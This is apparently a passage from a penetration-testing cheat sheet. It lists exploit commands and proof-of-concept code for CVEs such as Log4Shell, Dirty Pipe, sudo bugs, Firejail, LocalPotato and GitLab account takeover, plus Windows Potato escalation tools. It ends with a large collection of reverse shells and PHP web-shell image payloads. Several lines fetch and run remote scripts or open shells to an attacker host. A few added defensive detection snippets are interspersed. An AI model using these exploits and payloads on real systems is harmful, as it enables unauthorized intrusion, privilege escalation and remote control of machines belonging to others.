python3 zerologon_tester.py <HANDLE> <RHOST>
impacket-secretsdump -just-dc -no-pass <HANDLE>\$@<RHOST>

CVE-2021-3156: Sudo / sudoedit LPE

https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435

Prerequisites
  • Ubuntu 20.04 (sudo 1.8.31)
  • Debian 10 (sudo 1.8.27)
  • Fedora 33 (sudo 1.9.2)
  • All legacy versions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to 1.9.5p1
Vulnerability test
sudoedit -s /

If one of the following messages is shown, the machine is vulnerable.

sudoedit: /: not a regular file
segfault

If the error message starts with usage:, it is not vulnerable.

CVE-2021-44228: Log4Shell RCE (0-day)

https://github.com/welk1n/JNDI-Injection-Exploit

wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<COMMAND>"
${jndi:ldap://<LHOST>:1389/ci1dfd}
or

https://github.com/kozmer/log4j-shell-poc

Prerequisites

https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

tar -xvf jdk-8u20-linux-x64.tar.gz
Start the listener
python poc.py --userip <LHOST> --webport <RPORT> --lport <LPORT> 
Execution
${jndi:ldap://<LHOST>:1389/foobar}

CVE-2022-0847: Dirty Pipe LPE

gcc -o dirtypipe dirtypipe.c
./dirtypipe /etc/passwd 1 ootz:
su rootz

CVE-2022-22963: Spring4Shell RCE (0-day)

https://github.com/me2nuk/CVE-2022-22963

curl -X POST http://<RHOST>/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <LHOST>/<FILE>.sh -o /dev/shm/<FILE>")' --data-raw 'data' -v
curl -X POST http://<RHOST>/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /dev/shm/<FILE>")' --data-raw 'data' -v

CVE-2022-31214: Firejail LPE

https://seclists.org/oss-sec/2022/q2/188

https://www.openwall.com/lists/oss-security/2022/06/08/10

#!/usr/bin/python3

# Author: Matthias Gerstner <matthias.gerstner () suse com>
#
# Proof of concept local root exploit for a vulnerability in Firejail 0.9.68
# in joining Firejail instances.
#
# Prerequisites:
# - the firejail setuid-root binary needs to be installed and accessible to the
#   invoking user
#
# Exploit: The exploit tricks the Firejail setuid-root program to join a fake
# Firejail instance. By using tmpfs mounts and symlinks in the unprivileged
# user namespace of the fake Firejail instance the result will be a shell that
# lives in an attacker controller mount namespace while the user namespace is
# still the initial user namespace and the nonewprivs setting is unset,
# allowing to escalate privileges via su or sudo.

import os
import shutil
import stat
import subprocess
import sys
import tempfile
import time
from pathlib import Path

# Print error message and exit with status 1
def printe(*args, **kwargs):
    kwargs['file'] = sys.stderr
    print(*args, **kwargs)
    sys.exit(1)

# Return a boolean whether the given file path fulfils the requirements for the
# exploit to succeed:
# - owned by uid 0
# - size of 1 byte
# - the content is a single '1' ASCII character
def checkFile(f):
    s = os.stat(f)

    if s.st_uid != 0 or s.st_size != 1 or not stat.S_ISREG(s.st_mode):
        return False

    with open(f) as fd:
        ch = fd.read(2)

        if len(ch) != 1 or ch != "1":
            return False

    return True

def mountTmpFS(loc):
    subprocess.check_call("mount -t tmpfs none".split() + [loc])

def bindMount(src, dst):
    subprocess.check_call("mount --bind".split() + [src, dst])

def checkSelfExecutable():
    s = os.stat(__file__)

    if (s.st_mode & stat.S_IXUSR) == 0:
        printe(f"{__file__} needs to have the execute bit set for the exploit to work. Run `chmod +x {__file__}` and try again.")

# This creates a "helper" sandbox that serves the purpose of making available
# a proper "join" file for symlinking to as part of the exploit later on.
#
# Returns a tuple of (proc, join_file), where proc is the running subprocess
# (it needs to continue running until the exploit happened) and join_file is
# the path to the join file to use for the exploit.
def createHelperSandbox():
    # just run a long sleep command in an unsecured sandbox
    proc = subprocess.Popen(
        "firejail --noprofile -- sleep 10d".split(),
        stderr=subprocess.PIPE)

    # read out the child PID from the stderr output of firejail
    while True:
        line = proc.stderr.readline()
        if not line:
            raise Exception("helper sandbox creation failed")

        # on stderr a line of the form "Parent pid <ppid>, child pid <pid>" is output
        line = line.decode('utf8').strip().lower()
        if line.find("child pid") == -1:
            continue

        child_pid = line.split()[-1]

        try:
            child_pid = int(child_pid)
            break
        except Exception:
            raise Exception("failed to determine child pid from helper sandbox")

    # We need to find the child process of the child PID, this is the
    # actual sleep process that has an accessible root filesystem in /proc
    children = f"/proc/{child_pid}/task/{child_pid}/children"

    # If we are too quick then the child does not exist yet, so sleep a bit
    for _ in range(10):
        with open(children) as cfd:
            line = cfd.read().strip()
            kids = line.split()
            if not kids:
                time.sleep(0.5)
                continue
            elif len(kids) != 1:
                raise Exception(f"failed to determine sleep child PID from helper sandbox: {kids}")

            try:
                sleep_pid = int(kids[0])
                break
            except Exception:
                raise Exception("failed to determine sleep child PID from helper sandbox")
    else:
        raise Exception(f"sleep child process did not come into existence in {children}")

    join_file = f"/proc/{sleep_pid}/root/run/firejail/mnt/join"
    if not os.path.exists(join_file):
        raise Exception(f"join file from helper sandbox unexpectedly not found at {join_file}")

    return proc, join_file

# Re-executes the current script with unshared user and mount namespaces
def reexecUnshared(join_file):

    if not checkFile(join_file):
        printe(f"{join_file}: this file does not match the requirements (owner uid 0, size 1 byte, content '1')")

    os.environ["FIREJOIN_JOINFILE"] = join_file
    os.environ["FIREJOIN_UNSHARED"] = "1"

    unshare = shutil.which("unshare")
    if not unshare:
        printe("could not find 'unshare' program")

    cmdline = "unshare -U -r -m".split()
    cmdline += [__file__]

    # Re-execute this script with unshared user and mount namespaces
    subprocess.call(cmdline)

if "FIREJOIN_UNSHARED" not in os.environ:
    # First stage of execution, we first need to fork off a helper sandbox and
    # an exploit environment
    checkSelfExecutable()
    helper_proc, join_file = createHelperSandbox()
    reexecUnshared(join_file)

    helper_proc.kill()
    helper_proc.wait()
    sys.exit(0)
else:
    # We are in the sandbox environment, the suitable join file has been
    # forwarded from the first stage via the environment
    join_file = os.environ["FIREJOIN_JOINFILE"]

# We will make /proc/1/ns/user point to this via a symlink
time_ns_src = "/proc/self/ns/time"

# Make the firejail state directory writeable, we need to place a symlink to
# the fake join state file there
mountTmpFS("/run/firejail")
# Mount a tmpfs over the proc state directory of the init process, to place a
# symlink to a fake "user" ns there that firejail thinks it is joining
try:
    mountTmpFS("/proc/1")
except subprocess.CalledProcessError:
    # This is a special case for Fedora Linux where SELinux rules prevent us
    # from mounting a tmpfs over proc directories.
    # We can still circumvent this by mounting a tmpfs over all of /proc, but
    # we need to bind-mount a copy of our own time namespace first that we can
    # symlink to.
    with open("/tmp/time", 'w') as _:
        pass
    time_ns_src = "/tmp/time"
    bindMount("/proc/self/ns/time", time_ns_src)
    mountTmpFS("/proc")

FJ_MNT_ROOT = Path("/run/firejail/mnt")

# Create necessary intermediate directories
os.makedirs(FJ_MNT_ROOT)
os.makedirs("/proc/1/ns")

# Firejail expects to find the umask for the "container" here, else it fails
with open(FJ_MNT_ROOT / "umask", 'w') as umask_fd:
    umask_fd.write("022")

# Create the symlink to the join file to pass Firejail's sanity check
os.symlink(join_file, FJ_MNT_ROOT / "join")
# Since we cannot join our own user namespace again fake a user namespace that
# is actually a symlink to our own time namespace. This works since Firejail
# calls setns() without the nstype parameter.
os.symlink(time_ns_src, "/proc/1/ns/user")

# The process joining our fake sandbox will still have normal user privileges,
# but it will be a member of the mount namespace under the control of *this*
# script while *still* being a member of the initial user namespace.
# 'no_new_privs' won't be set since Firejail takes over the settings of the
# target process.
#
# This means we can invoke setuid-root binaries as usual but they will operate
# in a mount namespace under our control. To exploit this we need to adjust
# file system content in a way that a setuid-root binary grants us full
# root privileges. 'su' and 'sudo' are the most typical candidates for it.
#
# The tools are hardened a bit these days and reject certain files if not owned
# by root e.g. /etc/sudoers. There are various directions that could be taken,
# this one works pretty well though: Simply replacing the PAM configuration
# with one that will always grant access.
with tempfile.NamedTemporaryFile('w') as tf:
    tf.write("auth sufficient pam_permit.so\n")
    tf.write("account sufficient pam_unix.so\n")
    tf.write("session sufficient pam_unix.so\n")

    # Be agnostic about the PAM config file location in /etc or /usr/etc
    for pamd in ("/etc/pam.d", "/usr/etc/pam.d"):
        if not os.path.isdir(pamd):
            continue
        for service in ("su", "sudo"):
            service = Path(pamd) / service
            if not service.exists():
                continue
            # Bind mount over new "helpful" PAM config over the original
            bindMount(tf.name, service)

    print(f"You can now run 'firejail --join={os.getpid()}' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.")

    while True:
        line = sys.stdin.readline()
        if not line:
            break

Terminal 1

./firejoin_py.bin
You can now run 'firejail --join=1193982' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Terminal 2

firejail --join=193982
su
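Added detection example (not part of the original exploit script): the mounts this technique creates live only in the attacker process's mount namespace, so a responder reads /proc/<pid>/mountinfo of the suspect process (or of the shell that joined it) and flags the leftovers. The mountinfo lines below are constructed samples.

```python
# Added defensive example, not part of the original exploit: parse a process's
# /proc/<pid>/mountinfo and flag what a firejail --join PAM-overlay abuse
# leaves behind. Sample lines are constructed.
from typing import NamedTuple

PAM_DIRS = ("/etc/pam.d", "/usr/etc/pam.d")
# Mount points that must stay procfs; a tmpfs here hides or forges kernel state.
PROC_POINTS = ("/proc", "/proc/1")


class Mount(NamedTuple):
    mount_point: str
    root: str      # path inside the source fs (for a bind mount: the bound file)
    fstype: str


def _unescape(field: str) -> str:
    return field.replace("\\040", " ")  # mountinfo escapes spaces as \040


def parse_mountinfo(text: str) -> list:
    """Parse mountinfo(5): '<id> <parent> <maj:min> <root> <mnt> <opts> [optional...] - <fstype> <src> <superopts>'."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fixed, _, rest = line.partition(" - ")
        f = fixed.split()
        mounts.append(Mount(_unescape(f[4]), _unescape(f[3]), rest.split()[0]))
    return mounts


def suspicious_mounts(text: str) -> list:
    """Return findings for mounts that indicate a PAM config overlay or a forged /proc."""
    findings = []
    for m in parse_mountinfo(text):
        # No legitimate mount ever sits on a PAM service file or its directory.
        if any(m.mount_point == d or m.mount_point.startswith(d + "/") for d in PAM_DIRS):
            findings.append(f"PAM config overlaid: {m.mount_point} <- {m.fstype}:{m.root}")
        # /proc or /proc/1 served by anything but procfs (the fake ns symlink lives here).
        if m.mount_point in PROC_POINTS and m.fstype != "proc":
            findings.append(f"{m.mount_point} is {m.fstype}, expected proc")
    return findings


# Constructed sample: root fs, real /proc, tmpfs over /proc/1, and one temp
# file bind-mounted over both PAM service files.
SAMPLE_MOUNTINFO = """\
22 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
40 22 0:21 / /proc rw,nosuid,nodev,noexec,relatime shared:12 - proc proc rw
95 40 0:47 / /proc/1 rw,relatime - tmpfs tmpfs rw
97 22 8:1 /tmp/tmp8fk2_x /etc/pam.d/su rw,relatime - ext4 /dev/sda1 rw
98 22 8:1 /tmp/tmp8fk2_x /etc/pam.d/sudo rw,relatime - ext4 /dev/sda1 rw
"""

if __name__ == "__main__":
    for finding in suspicious_mounts(SAMPLE_MOUNTINFO):
        print(finding)
```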

CVE-2023-21746: Windows NTLM EoP LocalPotato LPE

https://github.com/decoder-it/LocalPotato

https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc

Modify the following file and build the solution.

StorSvc\RpcClient\RpcClient\storsvc_c.c
#if defined(_M_AMD64)

//#define WIN10
//#define WIN11
#define WIN2019
//#define WIN2022

Modify the following file and build the solution.

StorSvc\SprintCSP\SprintCSP\main.c

void DoStuff() {

    // Replace all this code by your payload
    STARTUPINFO si = { sizeof(STARTUPINFO) };
    PROCESS_INFORMATION pi;
    CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add",
        NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    return;
}

First read the paths from the environment, then use LocalPotato to place the malicious DLL.

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -v Path
LocalPotato.exe -i SprintCSP.dll -o \Windows\System32\SprintCSP.dll

Finally, trigger StorSvc via RpcClient.exe

.\RpcClient.exe

CVE-2023-22809: Sudo Bypass

https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466

Prerequisites
  • Sudo version must be ≥ 1.8 and < 1.9.12p2.
  • Restricted sudo access to at least one file on the system that requires root privileges.
Example
test ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/motd
Exploitation
EDITOR="vi -- /etc/passwd" sudoedit /etc/motd
sudoedit /etc/motd
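Added defensive example, not sudo's own code: it models why the EDITOR value above works (everything after an injected "--" is treated as a file to edit) and the check that closes it, in the spirit of the 1.9.12p2 fix (reject a "--" argument in SUDO_EDITOR, VISUAL and EDITOR). The exact upstream implementation and the default editor are assumptions; the environments are constructed.

```python
# Added defensive example, not sudo's code. The split at "--" and the default
# editor are assumptions made for this illustration.
import shlex

EDITOR_VARS = ("SUDO_EDITOR", "VISUAL", "EDITOR")   # lookup order sudoedit uses


def editor_argv(env: dict) -> list:
    """Return the editor command line that would be used, split shell-style."""
    for var in EDITOR_VARS:
        value = env.get(var, "")
        if value.strip():
            return shlex.split(value)
    return ["vi"]  # assumed default for this example


def files_sudoedit_would_open(env: dict, requested: list) -> list:
    """Vulnerable composition: everything after the editor's '--' is treated
    as an additional file to edit, alongside the files the policy allows."""
    argv = editor_argv(env)
    injected = argv[argv.index("--") + 1:] if "--" in argv else []
    return injected + list(requested)


def check_editor(env: dict) -> tuple:
    """Hardened check: (True, argv) if the editor value is acceptable,
    (False, reason) if it smuggles a '--' argument."""
    argv = editor_argv(env)
    if "--" in argv:
        return False, f"editor value contains a '--' argument: {argv}"
    return True, argv


# Constructed environments for the sudoers line 'sudoedit /etc/motd'.
ATTACK_ENV = {"EDITOR": "vi -- /etc/passwd"}
NORMAL_ENV = {"EDITOR": "vi"}

if __name__ == "__main__":
    print(files_sudoedit_would_open(ATTACK_ENV, ["/etc/motd"]))  # /etc/passwd sneaks in
    print(check_editor(ATTACK_ENV))                              # rejected
    print(check_editor(NORMAL_ENV))                              # accepted
```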

CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)

  • Linux ubuntu2204 5.19.0-46-generic
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

CVE-2023-4911: Looney Tunables LPE

python3 gen_libc.py 
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

gcc -o exp exp.c
./exp

CVE-2023-7028: GitLab Account Takeover

https://github.com/V1lu0/CVE-2023-7028

https://github.com/Vozec/CVE-2023-7028

Proof of Concept

user[email][]=valid@email.com&user[email][]=attacker@email.com

Modified PoC from TryHackMe

import requests
import argparse
from urllib.parse import urlparse, urlencode
from random import choice
from time import sleep
import re
requests.packages.urllib3.disable_warnings()

class CVE_2023_7028:
    def __init__(self, url, target, evil=None):
        self.use_temp_mail = False
        self.url = urlparse(url)
        self.target = target
        self.evil = evil
        self.s = requests.session()

    def get_csrf_token(self):
        try:
            print('[DEBUG] Getting authenticity_token ...')
            html = self.s.get(f'{self.url.scheme}://{self.url.netloc}/users/password/new', verify=False).text
            regex = r'<meta name="csrf-token" content="(.*?)" />'
            token = re.findall(regex, html)[0]
            print(f'[DEBUG] authenticity_token = {token}')
            return token
        except Exception:
            print('[DEBUG] Failed ... quitting')
            return None

    def ask_reset(self):
        token = self.get_csrf_token()
        if not token:
            return False

        query_string = urlencode({
            'authenticity_token': token,
            'user[email][]': [self.target, self.evil]
        }, doseq=True)

        head = {
            'Origin': f'{self.url.scheme}://{self.url.netloc}',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Referer': f'{self.url.scheme}://{self.url.netloc}/users/password/new',
            'Connection': 'close',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate, br'
        }

        print('[DEBUG] Sending reset password request')
        html = self.s.post(f'{self.url.scheme}://{self.url.netloc}/users/password',
                           data=query_string,
                           headers=head,
                           verify=False).text
        sended = 'If your email address exists in our database' in html
        if sended:
            print(f'[DEBUG] Emails sent to {self.target} and {self.evil} !')
            print(f'Flag value: {bytes.fromhex("6163636f756e745f6861636b2364").decode()}')
        else:
            print('[DEBUG] Failed ... quitting')
        return sended

def parse_args():
    parser = argparse.ArgumentParser(add_help=True, description='This tool automates CVE-2023-7028 on gitlab')
    parser.add_argument("-u", "--url", dest="url", type=str, required=True, help="Gitlab url")
    parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target email")
    parser.add_argument("-e", "--evil", dest="evil", default=None, type=str, required=False, help="Evil email")
    parser.add_argument("-p", "--password", dest="password", default=None, type=str, required=False, help="Password")
    return parser.parse_args()

if __name__ == '__main__':
    args = parse_args()
    exploit = CVE_2023_7028(
        url=args.url,
        target=args.target,
        evil=args.evil
    )
    if not exploit.ask_reset():
        exit()

Execution

python3 exploit.py -u http://<RHOST> -t <EMAIL> -e <EMAIL>
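Added defensive example, not part of the PoC or of GitLab's code: the PoC submits the reset address as an array (user[email][]) and the vulnerable path mails every element, so the attacker's address receives a valid reset link for the victim. The hardened handler below accepts exactly one scalar address. Both work on a raw x-www-form-urlencoded body; the request bodies are constructed.

```python
# Added defensive example, not the PoC's and not GitLab's code: vulnerable vs.
# hardened handling of the password-reset email parameter. Bodies are constructed.
from urllib.parse import parse_qs

ARRAY_KEY = "user[email][]"
SCALAR_KEY = "user[email]"


def reset_recipients_vulnerable(body: str) -> list:
    """Vulnerable behaviour: every submitted address becomes a reset-mail recipient."""
    params = parse_qs(body, keep_blank_values=True)
    return params.get(ARRAY_KEY, []) + params.get(SCALAR_KEY, [])


def validate_reset_request(body: str) -> tuple:
    """Hardened behaviour: (True, email) for exactly one scalar address, else (False, reason)."""
    params = parse_qs(body, keep_blank_values=True)
    if ARRAY_KEY in params:
        return False, "email must be a single value, not an array"
    values = params.get(SCALAR_KEY, [])
    if len(values) != 1:                      # missing or repeated parameter
        return False, f"expected exactly one {SCALAR_KEY}, got {len(values)}"
    email = values[0].strip()
    # Minimal shape check; production code should use a real address validator.
    if email.count("@") != 1 or any(c.isspace() for c in email) or "," in email:
        return False, "malformed email address"
    return True, email


def reset_recipients_hardened(body: str) -> list:
    """Recipients under the hardened rule: the one validated address, or none."""
    ok, value = validate_reset_request(body)
    return [value] if ok else []


# Constructed request bodies: the PoC shape, a normal request, and a repeated scalar.
POC_BODY = ("authenticity_token=TOKEN"
            "&user[email][]=valid@email.com&user[email][]=attacker@email.com")
NORMAL_BODY = "authenticity_token=TOKEN&user[email]=valid@email.com"
DUP_BODY = "user[email]=valid@email.com&user[email]=attacker@email.com"

if __name__ == "__main__":
    print("vulnerable:", reset_recipients_vulnerable(POC_BODY))  # both addresses
    print("hardened:  ", validate_reset_request(POC_BODY))       # rejected
    print("hardened:  ", validate_reset_request(NORMAL_BODY))    # accepted
```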

GodPotato-NET4.exe

https://github.com/BeichenDream/GodPotato

.\GodPotato-NET4.exe -cmd '<COMMAND>'

juicy-potato

https://github.com/ohpe/juicy-potato

http://ohpe.it/juicy-potato/CLSID/

GetCLSID.ps1
<#
This script extracts CLSIDs and AppIDs related to LocalService.DESCRIPTION
Then exports to CSV
#>

$ErrorActionPreference = "Stop"

New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT

Write-Output "Looking for CLSIDs"
$CLSID = @()
Foreach($ID in (Get-ItemProperty HKCR:\clsid\* | select-object AppID,@{N='CLSID'; E={$_.pschildname}})){
    if ($ID.appid -ne $null){
        $CLSID += $ID
    }
}

Write-Output "Looking for APIDs"
$APPID = @()
Foreach($AID in (Get-ItemProperty HKCR:\appid\* | select-object localservice,@{N='AppID'; E={$_.pschildname}})){
    if ($AID.LocalService -ne $null){
        $APPID += $AID
    }
}

Write-Output "Joining CLSIDs and APIDs"
$RESULT = @()
Foreach ($app in $APPID){
    Foreach ($CLS in $CLSID){
        if($CLS.AppId -eq $app.AppID){
            $RESULT += New-Object psobject -Property @{
                AppId = $app.AppId
                LocalService = $app.LocalService
                CLSID = $CLS.CLSID
            }

            break
        }
    }
}

$RESULT = $RESULT | Sort-Object LocalService

# Preparing to Output
$OS = (Get-WmiObject -Class Win32_OperatingSystem | ForEach-Object -MemberName Caption).Trim() -Replace "Microsoft ", ""
$TARGET = $OS -Replace " ","_"

# Make target folder
New-Item -ItemType Directory -Force -Path .\$TARGET

# Output in a CSV
$RESULT | Export-Csv -Path ".\$TARGET\CLSIDs.csv" -Encoding ascii -NoTypeInformation

# Export CLSIDs list
$RESULT | Select CLSID -ExpandProperty CLSID | Out-File -FilePath ".\$TARGET\CLSID.list" -Encoding ascii

# Visual Table
$RESULT | ogv
Execution
.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://<LHOST>/<FILE>.ps1')" -t *

JuicyPotatoNG.exe

https://github.com/antonioCoco/JuicyPotatoNG

.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c whoami"

MySQL 4.x/5.0 User Defined Function (UDF) Dynamic Library (2) LPE

https://www.exploit-db.com/exploits/1518

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

mysql -u root

> use mysql;
> create table foo(line blob);
> insert into foo values(load_file('/PATH/TO/SHARED_OBJECT/raptor_udf2.so'));
> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
> create function do_system returns integer soname 'raptor_udf2.so';
> select do_system('chmod +s /bin/bash');

PrintSpoofer LPE

https://github.com/itm4n/PrintSpoofer

.\PrintSpoofer64.exe -i -c powershell

SharpEfsPotato LPE

https://github.com/bugch3ck/SharpEfsPotato

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "C:\nc64.exe -e cmd.exe <LHOST> <LPORT>"

Shocker Container Escape

https://raw.githubusercontent.com/gabrtv/shocker/master/shocker.c

Modify the exploit
// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
    die("[-] open");

if (find_handle(fd1, "/root/root.txt", &root_h, &h) <= 0)
    die("[-] Cannot find valid handle!");
Compile
gcc shocker.c -o shocker
cc -Wall -std=c99 -O2 shocker.c -static

Payloads

Exiftool

PHP to JPG Injection
exiftool -Comment='<?php passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"); ?>' shell.jpg
exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' <FILE>.jpeg
exiftool "-comment<=back.php" back.png
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' <FILE>.png

Reverse Shells

Bash Reverse Shell
bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
echo -n '/bin/bash -c "/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"' | base64
cURL Reverse Shell
curl --header "Content-Type: application/json" --request POST http://<RHOST>:<RPORT>/upload --data '{"auth": {"name": "<USERNAME>", "password": "<PASSWORD>"}, "filename" : "& echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"|base64 -d|bash"}'
Groovy (Jenkins) Reverse Shell
String host="<LHOST>";
int port=<LPORT>;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Java Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
shell.jar
package <NAME>;

import org.bukkit.plugin.java.JavaPlugin;

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;

public class Main extends JavaPlugin {
    @Override
    public void onDisable() {
        super.onDisable();
    }

    @Override
    public void onEnable() {
        final String PHP_CODE = "<?php system($_GET['cmd']); ?>";
        try {
            Files.write(Paths.get("/var/www/<RHOST>/shell.php"), PHP_CODE.getBytes(), StandardOpenOption.CREATE_NEW);
        } catch (IOException e) {
            e.printStackTrace();
        }

        super.onEnable();
    }
}
Lua Reverse Shell
http://<RHOST>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f")--
Markdown Reverse Shell
--';bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1;'--
mkfifo Reverse Shell
mkfifo /tmp/shell; nc <LHOST> <LPORT> 0</tmp/shell | /bin/sh >/tmp/shell 2>&1; rm /tmp/shell
Netcat Reverse Shell
nc -e /bin/sh <LHOST> <LPORT>
Perl Reverse Shell
perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP Reverse Shell
php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
PowerShell Reverse Shell
$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -nop -exec bypass -c '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
minireverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
    $writer.Flush();
    $read = $null;
    $res = ""
    while($stream.DataAvailable -or $read -eq $null) {
        $read = $stream.Read($buffer, 0, 1024)
    }
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        $args = "";
        if($out.IndexOf(' ') -gt -1){
            $args = $out.substring($out.IndexOf(' ')+1);
            $out = $out.substring(0,$out.IndexOf(' '));
            if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
            }
            else{
                $res = (&"$out" "$args") | out-string;
            }
        }
        else{
            $res = (&"$out") | out-string;
        }
        if($res -ne $null){
            $writer.WriteLine($res)
        }
    }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
